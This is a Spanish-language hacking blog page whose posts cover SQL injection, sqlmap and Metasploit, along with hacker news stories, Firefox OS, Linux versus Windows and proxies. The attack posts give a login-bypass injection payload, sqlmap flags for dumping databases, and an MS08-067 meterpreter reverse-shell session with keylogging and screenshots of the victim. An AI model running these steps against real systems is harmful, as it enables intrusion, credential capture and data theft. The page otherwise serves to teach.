SQL INJECTION

Que es?
Un SQL Injection se basa en un fallo en la comunicación entre el usuario final y la base de datos. Consiste en un ataque contra un Gestor de Base de Datos Relacionales que aprovecha la vulnerabilidad de una aplicación. La vulnerabilidad es permitir mandar instrucciones SQL adicionales a partir de un campo o un parametro de entradas "inyectadas". Al estar vulnerables se puede lograr la finalidad de un ataque.

Como hacerlo?
Para ingresar a una pagina web nos podemos identificar con un usuario 'admin' es el mas común  y en el password ponemos la siguiente sentencia: ‘ OR ”=’

Con esta consulta engañamos al sistema ya que forzamos una comparación de “nada” es igual a “nada” lo que nos da acceso al sistema.

Al igual que la anterior consulta se pueden intentar inyectar unas cuantas más forzando comparaciones simples (OR 1=1) o intentando comentar el código con “//” o “/* */”

Evitar un SQL Injection

Se deben controlar los datos de  entrada, no se deben confiar en las entradas de los usuarios, no utilizar secuencias SQL construidas dinamicamente, no utilizar cuentas con privilegios administrativos.

filtrar las consultas con mysql_real_escape_string()

$u=mysql_real_escape_string($_POST['usuario']);

$p=mysql_real_escape_string($_POST['password']);
SELECT * FROM users WHERE user='$u' AND password='$p'




mysql_real_escape_string() llama a la función de la biblioteca MySQL mysql_real_escape_string, la cual coloca barras invertidas antes de los siguientes caracteres: \x00, \n, \r, \, ‘, ” y \x1a

Read more »

[Hacking Web] - Inyección SQL con Backtrack

Inyección SQL es un método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar consultas a una base de datos.

El origen de la vulnerabilidad radica en el incorrecto chequeo y/o filtrado de las variables utilizadas en un programa que contiene, o bien genera, código SQL. 

El comienzo es ingresar a la base que tenemos en nuestro ordenador.

En seguida buscamos alguna pagina que tenga php?= id, lo cual la vuelve vulnerable a un ataque de inyección mysql

En seguida podemos verificar cual es el metodo por el cual podemos atacar la pagina. GET

http://www.youtube.com/watch?v=VokjvcNSBOs&feature=player_embedded

php?id=  -> sintaxis necesaria para explotar vulnerabilidad en un enlace web

python ./sqlmap.py -> da la orden de activar inyeccion sql

-u -> permiso para colocar url vulnerable

--dbs -> comando que sirve para buscar base de datos 

--threads 5 -> comando que condiciona la agresividad de exploracion

--tables -> comando para buscar tablas dentro de una base de datos

--columns -> comando para buscar columnas dentro de una tabla de base de datos

-D -> comando que autoriza colocar el nombre de una base de datos

-T -> comando que autoriza colocar el nombre de una tabla dentro de la base de datos

-C -> comando que autoriza colocar el nombre de una columna dentro de la tabla de una base de datos

--dump -> comando que autoriza mostrar el contenido general

Tomado de: http://www.backtrack.grupobloglatino.com/2013/04/hacking-web-inyeccion-sql-con-backtrack.html

Read more »

Ataque exploit a windows [Hacking-Etico]

Descargar ISO win xp: Aquí Descargar ISO backtrack5 R3: Aquí

root@bt:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi

msf > set rhost (victima) msf > set lhost (atacante) msf > set payload windows/meterpreter/reverse_tcp msf > exploit
meterpreter > ps (aca tenemos que ubicar el numero de explorer.exe) meterpreter > migrate (numero de explorer.exe) meterpreter > keyscan_start meterpreter > keyscan_dump
meterpreter > use espia meterpreter > screenshot Tomado de:http://www.backtrack.grupobloglatino.com/2012/12/backtrack-5-r3-ataque-exploit-windows.html

Read more »

Noticia hackers del Mundo

UN NUEVO RECORD HACKER 

Un nuevo récord: hacker elimina más de 50 sites en media hora Un criminal cibernético desconocido, que se esconde bajo apodo F3PN, por la mañana del día 2 de mayo de este año batió un nuevo “record” por atacar sites. En un período que duró media hora, entre 8:30 y 9:00 atacó 53 sites en el dominio .co.za.

Estos Hacker la ley los ama jajaja

Adrian Lamo

Lamo fue quien logro penetrar los sistemas mas protegidos del mundo como Microsoft, y The New York Times. Entre sus listas de victimas tambien estuvo la pagina Yahoo,Bank Of America,Cingular. Lamo al penetrar el sistema de The New York Times fue detenido sin saber de sus demas crimenes fue liberado tras pagar 65,000 dlrs.

 

Kevin Poulsen

fue uno de los primeros en hackear la base de datos del fbi y la radio de los angeles KIIS-FM junto con sus lineas telefonicas , el es conocido como el maestro de las lineas telefonicas ya que esa es su especialidad 


 

Kevin Mitnick, el hacker más famoso del mundo

Un currículum muy buscado

La fulgurante carrera del Kevin Mitnick se inició en la década de los 80, periodo en el que fue arrestado en cuatro ocasiones y pasó su primera temporada en la cárcel. En 1992, y estando en libertad condicional, fue acusado nuevamente de hackear distintos servidores. La víspera del día de Navidad del citado año huyó de la justicia y permaneció en busca y captura hasta 1995, cuando fue detenido en Carolina del Norte. 

Mitnick fue entonces acusado de fraude informático y del robo de millones de dólares en software de importantes compañías tecnológicas. Como ejemplo, sobre él pesaron hasta ocho cargos de posesión ilegal de los ficheros electrónicos de empresas como Motorola Inc. y Sun Microsystems Inc. 

Tras su detención, Mitnick sentó cátedra. Sin quererlo se convirtió en el líder de gran parte de los hackers de todo el mundo y éstos, en el empeño de liberar a su mentor, iniciaron una campaña de ataques sistemáticos. 

Comenzaron a finales de 1997. El grupo colocó en el servidor de Yahoo un mensaje en el que advertían de la invasión irremediable de un virus que iba a causar verdaderos estragos en el planeta de los cibernautas. Consiguerion acceder al servidor, pero no causaron el menor daño. Simplemente dejaron un mensaje , en el que aseguraban que sólo entregarían la fórmula secreta si era liberado Kevin Mitnick. 

Siguieron a principios de 1998. Según informaba entonces News.Com, un grupo de piratas había conseguido adentrarse en el sistema informático de Naciones Unidas y verter por unas horas su particular mensaje: si Mitnick no era liberado, tendría lugar un "holocausto" informático. 

Sin embargo, la fama mundial la obtuvieron con el ataque del web del New York Times. Era domingo, 13 de septiembre. Los internautas que entonces entraron en el sitio del famoso rotativo se encontraron con una página en blanco en la que podían leerse las siglas HFG (Hacking for Girlies), acompañadas de fotografías de mujeres desnudas y un pequeño texto en el que explicaban el motivo del ataque. Además, incluían la lista de sus "conquistas" (entre las que se están las páginas de Motorola, Penthouse o la Nasa). 

 

Gary McKinnon y el Pentagono

Gary McKinnon, también llamado ‘Solo’, entro al mundo de la fama tras haber entrado a los computadores del pentágono en los Estados Unidos. Se estará enfrentando a una sentencia de pasar el resto de su vida en la cárcel por haber entrado en casi un centenar de computadores militares y de la NASA. Esto es muy grave, ya que todas sus intrusiones ocurrieron justo después de los atentados del 11S. 
Obviamente, McKinnon acepto su intrucion a dichos sistemas, alegando que no causo daño alguno y que se conecto desde la casa para realizar dichos ataques. Curioso como uno de los ‘hacks’ mas famosos se haya realizado desde un lugar tan fácilmente rastreable (ademas de obvio). 

Lo interesante de la historia, es que el motivo por los cuales McKinnon hizo y deshizo con las redes militares estadounidenses, fue alentado por la busqueda de duendecillos verdes del espacio exterior. El estaba convencido de que el gobierno norteamericano estaba ocultando informacion relacionada con OVNIs y vida extraterrestre, y al parecer encontro informacion que confirma dichas sospechas 





  

EL MUNDO

Detenido en Australia presunto hacker de LulzSec

La policía australiana detuvo a uno de los supuestos líderes del grupo de hackers LulzSec en Sydney, informaron las autoridades.

Al hombre, de 24 años y que trabajaba en el sector de las tecnologías de la información, se le acusa de entrar ilegalmente en una red informática. El detenido, que salió en libertad tras el pago de una fianza, es sospechoso de atacar en abril una web del gobierno australiano.

El grupo de hackers LulzSec está acusado de ataque a redes de grandes estudios de Hollywood, entre otros.

Los piratas informáticos de LulzSec saltaron a la luz pública sobre todo en 2011, cuando comenzaron a atacar una serie de webs y servidores de bases de datos, entre otras la de los estudios de Hollywood Sony Pictures y 20th Century Fox o incluso de la CIA.

Después de algunos meses el grupo, cercano al movimiento Anonymus, anunció su disolución. El año pasado, cuatro supuestos miembros de LulzSec fueron detenidos en Estados Unidos y dos en Reino Unido.

Read more »

FIREFOX OS EN MOBILES

FIREFOX OS EN MOBILES

En este video pueden observar los avances de el equipo Mozilla Hispano en cuanto a tecnologías mobiles.

vídeo tomado de: http://www.youtube.com/watch?v=Trpc_gSa8bA

Read more »

Linux VS Windows

LINUX VS WINDOWS

En cuanto a la instalación:

• En Windows la instalación es minimamente configurable aunque es muy sencilla.
• En Linux  la instalación no es sencilla pero permite personalizar totalmente los paquetes que se deseen instalar.

En cuanto a compatibilidad:

Ninguno de los dos Sistemas Operativos son el 100% compatibles con el Hardware, a pesar de que Windows se acerca más, los dos estan cerca de conseguirlo.

• Windows al ser parte de Microsoft ofrece gran cantidad de drivers.
•  Linux no esta en ninguna casa comercial, pero ofrece actualizaciones frecuentes.

En cuanto a software:

•  Windows es el mas facil de usar y posee gran cantidad de software
•  Linux ofrece menos software pero gracias a empresas como IBM ha logrado muchos avances

En cuanto a Robustez:

• Linux se ha caracterizado siempre por la robustez de su sistema ya que pueden pasar meses e incluso años sin la necesidad de apagar o reiniciar el equipo, también si una aplicación falla simplemente no bloquea totalmente al equipo.
• En Windows siempre hay que reiniciar cuando se cambia la configuración del sistema, se bloquea fácilmente cuando ejecuta operaciones aparentemente simples por lo que hay que reiniciar el equipo.

ESTAS SON LAS ESPECIFICACIONES BÁSICAS QUE SE RESALTAN EN ESTOS DOS SISTEMAS OPERATIVOS, LA DECISIÓN LA TOMAN USTEDES....

Read more »

USO DE PROXY

Un proxy, en una red informática, es un programa o dispositivo que realiza una acción en representación de otro, esto es, si una hipotética máquina A solicita un recurso a una C, lo hará mediante una petición a B; C entonces no sabrá que la petición procedió originalmente de A.

Su finalidad más habitual es la de servidor proxy, que sirve para interceptar las conexiones de red que un cliente hace a un servidor de destino, por varios motivos posibles como seguridad, rendimiento, anonimato, etc.

Ventajas

La ventaja más importante al utilizar un servidor proxy en Internet, es el anonimato teórico que nos puede brindar el mismo, ya que a todos los efectos prácticos es otra PC que está navegando en lugar de nosotros. Con esto, no podrán saber nuestra dirección IP, tampoco que navegador usamos, ni ninguna información relacionada con nosotros.

Tambien en las ventajas estan:

*  Ahorro de Tráfico

*  Velocidad en Tiempo de respuesta

*  Demanda a Usuarios

*  Filtrado de contenido

*  Modificación de contenidos

Desventajas

Las páginas mostradas pueden no estar actualizadas si éstas han sido modificadas desde la última carga que realizó el proxy caché.

Un diseñador de páginas web puede indicar en el contenido de su web que los navegadores no  hagan una caché de sus páginas, pero este método no funciona habitualmente para un proxy.

El hecho de acceder a Internet a través de un Proxy, en vez de mediante conexión directa, impide realizar operaciones avanzadas a través de algunos puertos o protocolos.

Almacenar las páginas y objetos que los usuarios solicitan puede suponer una violación de la intimidad para algunas personas.

Read more »